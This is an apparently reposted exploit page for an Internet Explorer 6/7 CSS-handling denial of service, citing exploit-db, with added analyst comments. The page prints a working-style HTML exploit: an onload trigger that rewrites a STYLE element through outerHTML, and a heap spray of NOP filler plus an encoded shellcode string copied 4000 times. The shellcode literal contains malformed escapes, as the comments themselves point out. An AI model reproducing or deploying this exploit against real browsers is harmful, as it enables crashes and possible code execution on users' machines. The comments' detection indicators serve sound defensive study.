Internet Explorer 6/7 CSS Handling Denial of Service
IE6/7 CSS 处理拒绝服务
利用代码:
<!-- securitylab.ir K4mr4n_st (at) yahoo (dot) com [email concealed] -->
<!--
  Analyst notes on this listing (defensive reading):
  * The page has two independent parts: a trigger (the load() handler wired to
    BODY onload) and a memory-filling script that runs while HEAD is parsed.
  * Trigger: load() overwrites the first STYLE element through outerHTML. Per the
    page title this is the CSS-handling step that crashes Internet Explorer 6/7;
    the listing itself does not show why the browser fails.
  * Memory fill: the second script stores 4000 large strings, each made of
    0x9090 filler followed by a payload string. That is the heap-spray layout,
    which suggests the author treated the crash as potentially more than a
    denial of service (inferred from the code, not stated on the page).
  * Content-inspection indicators visible here: unescape() over long runs of
    %uXXXX, the %u9090 filler, string-doubling loops bounded by a size constant
    (0x40000), thousands of copies written into an array, and an outerHTML write
    to a STYLE element from an onload handler.
  * Exposure is limited to the browser versions named in the title. Hardening
    that applies: retire those versions or apply the vendor fix, disable Active
    Scripting for untrusted zones, and enable DEP so sprayed data is not
    executable.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
  // Trigger, called from BODY onload: fetch the first STYLE element in the
  // document and replace the whole element with the text "1" via outerHTML.
  function load(){
    var e;
    e=document.getElementsByTagName("STYLE")[0];
    e.outerHTML="1";
  }
</script>
<!-- The stylesheet that load() later removes; its rules are ordinary CSS. -->
<STYLE type="text/css">
  body{ overflow: scroll; margin: 0; }
</style>
<SCRIPT language="javascript">
  // Payload string decoded from %u escapes.
  // NOTE(review): as reproduced on this page the literal contains malformed
  // escape sequences, so it is not a faithful copy of the original sample;
  // do not derive hashes or byte signatures from this listing.
  var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EEu99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB0%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u 7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
  // Filler unit: two 16-bit 0x9090 values (0x90 is the x86 NOP opcode).
  var bigblock = unescape("%u9090%u9090");
  // headersize is a fixed allowance of 20 characters; the page does not say
  // what it accounts for (presumably per-string allocation overhead).
  var headersize = 20;
  var slackspace = headersize+shellcode.length;
  // Double the filler until it is at least slackspace characters long.
  while (bigblock.length<slackspace) bigblock+=bigblock;
  // fillblock: exactly slackspace characters of filler.
  fillblock = bigblock.substring(0, slackspace);
  // block: the filler with slackspace characters trimmed off the end.
  block = bigblock.substring(0, bigblock.length-slackspace);
  // Grow block until block plus slackspace reaches 0x40000 characters.
  while(block.length+slackspace<0x40000) block = block+block+fillblock;
  // Keep 4000 copies of filler plus payload alive in an array so the
  // allocations persist; fillblock, block, memory and x are implicit globals.
  memory = new Array();
  for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>
</HEAD>
<!-- onload fires after the script above has already run during parsing. -->
<BODY onload="load()">
</BODY>
</HTML> |
http://www.exploit-db.com/exploits/10210
另附国人公布的内容,具体是谁抄谁的就不得而知了,各位看官自己判断吧!
http://www.yxlink.com/newsview_15.html